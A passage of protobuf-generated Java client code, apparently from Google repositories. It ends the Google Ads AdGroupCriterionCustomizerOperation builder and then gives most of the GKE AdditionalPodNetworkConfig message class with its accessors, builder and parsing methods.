criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ public Builder clearCreate() { if (createBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } createBuilder_.clear(); } return this; } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ public com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.Builder getCreateBuilder() { return getCreateFieldBuilder().getBuilder(); } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizerOrBuilder getCreateOrBuilder() { if ((operationCase_ == 1) && (createBuilder_ != null)) { return createBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_; } return com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } } /** * <pre> * Create operation: No resource name is expected for the new ad group * criterion customizer. * </pre> * * <code>.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer create = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizerOrBuilder> getCreateFieldBuilder() { if (createBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.getDefaultInstance(); } createBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer, com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer.Builder, com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizerOrBuilder>( (com.google.ads.googleads.v21.resources.AdGroupCriterionCustomizer) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return createBuilder_; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return Whether the remove field is set. */ @java.lang.Override public boolean hasRemove() { return operationCase_ == 2; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The remove. */ @java.lang.Override public java.lang.String getRemove() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); if (operationCase_ == 2) { operation_ = s; } return s; } else { return (java.lang.String) ref; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return The bytes for remove. */ @java.lang.Override public com.google.protobuf.ByteString getRemoveBytes() { java.lang.Object ref = ""; if (operationCase_ == 2) { ref = operation_; } if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); if (operationCase_ == 2) { operation_ = b; } return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @param value The remove to set. * @return This builder for chaining. */ public Builder setRemove( java.lang.String value) { if (value == null) { throw new NullPointerException(); } operationCase_ = 2; operation_ = value; onChanged(); return this; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @return This builder for chaining. */ public Builder clearRemove() { if (operationCase_ == 2) { operationCase_ = 0; operation_ = null; onChanged(); } return this; } /** * <pre> * Remove operation: A resource name for the removed ad group criterion * customizer is expected, in this format: * * `customers/{customer_id}/adGroupCriterionCustomizers/{ad_group_id}~{criterion_id}~{customizer_attribute_id}` * </pre> * * <code>string remove = 2 [(.google.api.resource_reference) = { ... }</code> * @param value The bytes for remove to set. * @return This builder for chaining. */ public Builder setRemoveBytes( com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); operationCase_ = 2; operation_ = value; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation) private static final com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation(); } public static com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> PARSER = new com.google.protobuf.AbstractParser<AdGroupCriterionCustomizerOperation>() { @java.lang.Override public AdGroupCriterionCustomizerOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<AdGroupCriterionCustomizerOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v21.services.AdGroupCriterionCustomizerOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,765
java-container/proto-google-cloud-container-v1/src/main/java/com/google/container/v1/AdditionalPodNetworkConfig.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/container/v1/cluster_service.proto // Protobuf Java Version: 3.25.8 package com.google.container.v1; /** * * * <pre> * AdditionalPodNetworkConfig is the configuration for additional pod networks * within the NodeNetworkConfig message * </pre> * * Protobuf type {@code google.container.v1.AdditionalPodNetworkConfig} */ public final class AdditionalPodNetworkConfig extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.container.v1.AdditionalPodNetworkConfig) AdditionalPodNetworkConfigOrBuilder { private static final long serialVersionUID = 0L; // Use AdditionalPodNetworkConfig.newBuilder() to construct. private AdditionalPodNetworkConfig(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private AdditionalPodNetworkConfig() { subnetwork_ = ""; secondaryPodRange_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new AdditionalPodNetworkConfig(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.container.v1.ClusterServiceProto .internal_static_google_container_v1_AdditionalPodNetworkConfig_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.container.v1.ClusterServiceProto .internal_static_google_container_v1_AdditionalPodNetworkConfig_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.container.v1.AdditionalPodNetworkConfig.class, com.google.container.v1.AdditionalPodNetworkConfig.Builder.class); } private int bitField0_; public static final int SUBNETWORK_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object subnetwork_ = ""; /** * * * <pre> * Name of the subnetwork where the additional pod network belongs. * </pre> * * <code>string subnetwork = 1;</code> * * @return The subnetwork. */ @java.lang.Override public java.lang.String getSubnetwork() { java.lang.Object ref = subnetwork_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); subnetwork_ = s; return s; } } /** * * * <pre> * Name of the subnetwork where the additional pod network belongs. * </pre> * * <code>string subnetwork = 1;</code> * * @return The bytes for subnetwork. */ @java.lang.Override public com.google.protobuf.ByteString getSubnetworkBytes() { java.lang.Object ref = subnetwork_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); subnetwork_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int SECONDARY_POD_RANGE_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object secondaryPodRange_ = ""; /** * * * <pre> * The name of the secondary range on the subnet which provides IP address for * this pod range. * </pre> * * <code>string secondary_pod_range = 2;</code> * * @return The secondaryPodRange. */ @java.lang.Override public java.lang.String getSecondaryPodRange() { java.lang.Object ref = secondaryPodRange_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); secondaryPodRange_ = s; return s; } } /** * * * <pre> * The name of the secondary range on the subnet which provides IP address for * this pod range. * </pre> * * <code>string secondary_pod_range = 2;</code> * * @return The bytes for secondaryPodRange. */ @java.lang.Override public com.google.protobuf.ByteString getSecondaryPodRangeBytes() { java.lang.Object ref = secondaryPodRange_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); secondaryPodRange_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int MAX_PODS_PER_NODE_FIELD_NUMBER = 3; private com.google.container.v1.MaxPodsConstraint maxPodsPerNode_; /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> * * @return Whether the maxPodsPerNode field is set. */ @java.lang.Override public boolean hasMaxPodsPerNode() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> * * @return The maxPodsPerNode. */ @java.lang.Override public com.google.container.v1.MaxPodsConstraint getMaxPodsPerNode() { return maxPodsPerNode_ == null ? com.google.container.v1.MaxPodsConstraint.getDefaultInstance() : maxPodsPerNode_; } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ @java.lang.Override public com.google.container.v1.MaxPodsConstraintOrBuilder getMaxPodsPerNodeOrBuilder() { return maxPodsPerNode_ == null ? com.google.container.v1.MaxPodsConstraint.getDefaultInstance() : maxPodsPerNode_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(subnetwork_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, subnetwork_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(secondaryPodRange_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, secondaryPodRange_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(3, getMaxPodsPerNode()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(subnetwork_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, subnetwork_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(secondaryPodRange_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, secondaryPodRange_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(3, getMaxPodsPerNode()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.container.v1.AdditionalPodNetworkConfig)) { return super.equals(obj); } com.google.container.v1.AdditionalPodNetworkConfig other = (com.google.container.v1.AdditionalPodNetworkConfig) obj; if (!getSubnetwork().equals(other.getSubnetwork())) return false; if (!getSecondaryPodRange().equals(other.getSecondaryPodRange())) return false; if (hasMaxPodsPerNode() != other.hasMaxPodsPerNode()) return false; if (hasMaxPodsPerNode()) { if (!getMaxPodsPerNode().equals(other.getMaxPodsPerNode())) return false; } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + SUBNETWORK_FIELD_NUMBER; hash = (53 * hash) + getSubnetwork().hashCode(); hash = (37 * hash) + SECONDARY_POD_RANGE_FIELD_NUMBER; hash = (53 * hash) + getSecondaryPodRange().hashCode(); if (hasMaxPodsPerNode()) { hash = (37 * hash) + MAX_PODS_PER_NODE_FIELD_NUMBER; hash = (53 * hash) + getMaxPodsPerNode().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.container.v1.AdditionalPodNetworkConfig parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.container.v1.AdditionalPodNetworkConfig parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.container.v1.AdditionalPodNetworkConfig parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.container.v1.AdditionalPodNetworkConfig prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * AdditionalPodNetworkConfig is the configuration for additional pod networks * within the NodeNetworkConfig message * </pre> * * Protobuf type {@code google.container.v1.AdditionalPodNetworkConfig} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.container.v1.AdditionalPodNetworkConfig) com.google.container.v1.AdditionalPodNetworkConfigOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.container.v1.ClusterServiceProto .internal_static_google_container_v1_AdditionalPodNetworkConfig_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.container.v1.ClusterServiceProto .internal_static_google_container_v1_AdditionalPodNetworkConfig_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.container.v1.AdditionalPodNetworkConfig.class, com.google.container.v1.AdditionalPodNetworkConfig.Builder.class); } // Construct using com.google.container.v1.AdditionalPodNetworkConfig.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) { getMaxPodsPerNodeFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; subnetwork_ = ""; secondaryPodRange_ = ""; maxPodsPerNode_ = null; if (maxPodsPerNodeBuilder_ != null) { maxPodsPerNodeBuilder_.dispose(); maxPodsPerNodeBuilder_ = null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.container.v1.ClusterServiceProto .internal_static_google_container_v1_AdditionalPodNetworkConfig_descriptor; } @java.lang.Override public com.google.container.v1.AdditionalPodNetworkConfig getDefaultInstanceForType() { return com.google.container.v1.AdditionalPodNetworkConfig.getDefaultInstance(); } @java.lang.Override public com.google.container.v1.AdditionalPodNetworkConfig build() { com.google.container.v1.AdditionalPodNetworkConfig result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.container.v1.AdditionalPodNetworkConfig buildPartial() { com.google.container.v1.AdditionalPodNetworkConfig result = new com.google.container.v1.AdditionalPodNetworkConfig(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.container.v1.AdditionalPodNetworkConfig result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.subnetwork_ = subnetwork_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.secondaryPodRange_ = secondaryPodRange_; } int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000004) != 0)) { result.maxPodsPerNode_ = maxPodsPerNodeBuilder_ == null ? maxPodsPerNode_ : maxPodsPerNodeBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.container.v1.AdditionalPodNetworkConfig) { return mergeFrom((com.google.container.v1.AdditionalPodNetworkConfig) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.container.v1.AdditionalPodNetworkConfig other) { if (other == com.google.container.v1.AdditionalPodNetworkConfig.getDefaultInstance()) return this; if (!other.getSubnetwork().isEmpty()) { subnetwork_ = other.subnetwork_; bitField0_ |= 0x00000001; onChanged(); } if (!other.getSecondaryPodRange().isEmpty()) { secondaryPodRange_ = other.secondaryPodRange_; bitField0_ |= 0x00000002; onChanged(); } if (other.hasMaxPodsPerNode()) { mergeMaxPodsPerNode(other.getMaxPodsPerNode()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { subnetwork_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { secondaryPodRange_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 case 26: { input.readMessage(getMaxPodsPerNodeFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000004; break; } // case 26 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object subnetwork_ = ""; /** * * * <pre> * Name of the subnetwork where the additional pod network belongs. * </pre> * * <code>string subnetwork = 1;</code> * * @return The subnetwork. */ public java.lang.String getSubnetwork() { java.lang.Object ref = subnetwork_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); subnetwork_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Name of the subnetwork where the additional pod network belongs. * </pre> * * <code>string subnetwork = 1;</code> * * @return The bytes for subnetwork. */ public com.google.protobuf.ByteString getSubnetworkBytes() { java.lang.Object ref = subnetwork_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); subnetwork_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Name of the subnetwork where the additional pod network belongs. * </pre> * * <code>string subnetwork = 1;</code> * * @param value The subnetwork to set. * @return This builder for chaining. */ public Builder setSubnetwork(java.lang.String value) { if (value == null) { throw new NullPointerException(); } subnetwork_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Name of the subnetwork where the additional pod network belongs. * </pre> * * <code>string subnetwork = 1;</code> * * @return This builder for chaining. */ public Builder clearSubnetwork() { subnetwork_ = getDefaultInstance().getSubnetwork(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Name of the subnetwork where the additional pod network belongs. * </pre> * * <code>string subnetwork = 1;</code> * * @param value The bytes for subnetwork to set. * @return This builder for chaining. */ public Builder setSubnetworkBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); subnetwork_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private java.lang.Object secondaryPodRange_ = ""; /** * * * <pre> * The name of the secondary range on the subnet which provides IP address for * this pod range. * </pre> * * <code>string secondary_pod_range = 2;</code> * * @return The secondaryPodRange. */ public java.lang.String getSecondaryPodRange() { java.lang.Object ref = secondaryPodRange_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); secondaryPodRange_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * The name of the secondary range on the subnet which provides IP address for * this pod range. * </pre> * * <code>string secondary_pod_range = 2;</code> * * @return The bytes for secondaryPodRange. */ public com.google.protobuf.ByteString getSecondaryPodRangeBytes() { java.lang.Object ref = secondaryPodRange_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); secondaryPodRange_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * The name of the secondary range on the subnet which provides IP address for * this pod range. * </pre> * * <code>string secondary_pod_range = 2;</code> * * @param value The secondaryPodRange to set. * @return This builder for chaining. */ public Builder setSecondaryPodRange(java.lang.String value) { if (value == null) { throw new NullPointerException(); } secondaryPodRange_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * The name of the secondary range on the subnet which provides IP address for * this pod range. * </pre> * * <code>string secondary_pod_range = 2;</code> * * @return This builder for chaining. */ public Builder clearSecondaryPodRange() { secondaryPodRange_ = getDefaultInstance().getSecondaryPodRange(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * The name of the secondary range on the subnet which provides IP address for * this pod range. * </pre> * * <code>string secondary_pod_range = 2;</code> * * @param value The bytes for secondaryPodRange to set. * @return This builder for chaining. */ public Builder setSecondaryPodRangeBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); secondaryPodRange_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } private com.google.container.v1.MaxPodsConstraint maxPodsPerNode_; private com.google.protobuf.SingleFieldBuilderV3< com.google.container.v1.MaxPodsConstraint, com.google.container.v1.MaxPodsConstraint.Builder, com.google.container.v1.MaxPodsConstraintOrBuilder> maxPodsPerNodeBuilder_; /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> * * @return Whether the maxPodsPerNode field is set. */ public boolean hasMaxPodsPerNode() { return ((bitField0_ & 0x00000004) != 0); } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> * * @return The maxPodsPerNode. */ public com.google.container.v1.MaxPodsConstraint getMaxPodsPerNode() { if (maxPodsPerNodeBuilder_ == null) { return maxPodsPerNode_ == null ? com.google.container.v1.MaxPodsConstraint.getDefaultInstance() : maxPodsPerNode_; } else { return maxPodsPerNodeBuilder_.getMessage(); } } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ public Builder setMaxPodsPerNode(com.google.container.v1.MaxPodsConstraint value) { if (maxPodsPerNodeBuilder_ == null) { if (value == null) { throw new NullPointerException(); } maxPodsPerNode_ = value; } else { maxPodsPerNodeBuilder_.setMessage(value); } bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ public Builder setMaxPodsPerNode( com.google.container.v1.MaxPodsConstraint.Builder builderForValue) { if (maxPodsPerNodeBuilder_ == null) { maxPodsPerNode_ = builderForValue.build(); } else { maxPodsPerNodeBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * The maximum number of pods per node which use this pod network. * </pre> * * <code>optional .google.container.v1.MaxPodsConstraint max_pods_per_node = 3;</code> */ public Builder mergeMaxPodsPerNode(com.google.container.v1.MaxPodsConstraint value) { if (maxPodsPerNodeBuilder_ == null) { if (((bitField0_ & 0x00000004) != 0) && maxPodsPerNode_ != null && maxPodsPerNode_ != com.google.container.v1.MaxPodsConstraint.getDefaultInstance()) { getMaxPodsPerNodeBuilder().mergeFrom(value); } else { maxPodsPerNode_ = value; } } else { maxPodsPerNodeBuilder_.mergeFrom(value); } if (maxPodsPerNode_ != null) { bitField0_ |= 0x00000004; onChanged(); } return this; } /** * * * <pre> * 